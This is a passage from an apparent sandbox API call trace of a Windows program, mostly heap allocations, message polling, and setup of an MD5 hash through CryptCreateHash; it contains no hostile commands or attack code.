dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0128.458] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0128.458] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.458] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0128.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.458] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.459] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b18 [0128.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0128.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0128.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0128.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0128.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0128.459] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0128.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.461] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.461] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b18 [0128.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0128.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0128.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0128.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0128.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0128.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.466] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0128.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0128.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0128.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0128.466] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0128.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.497] 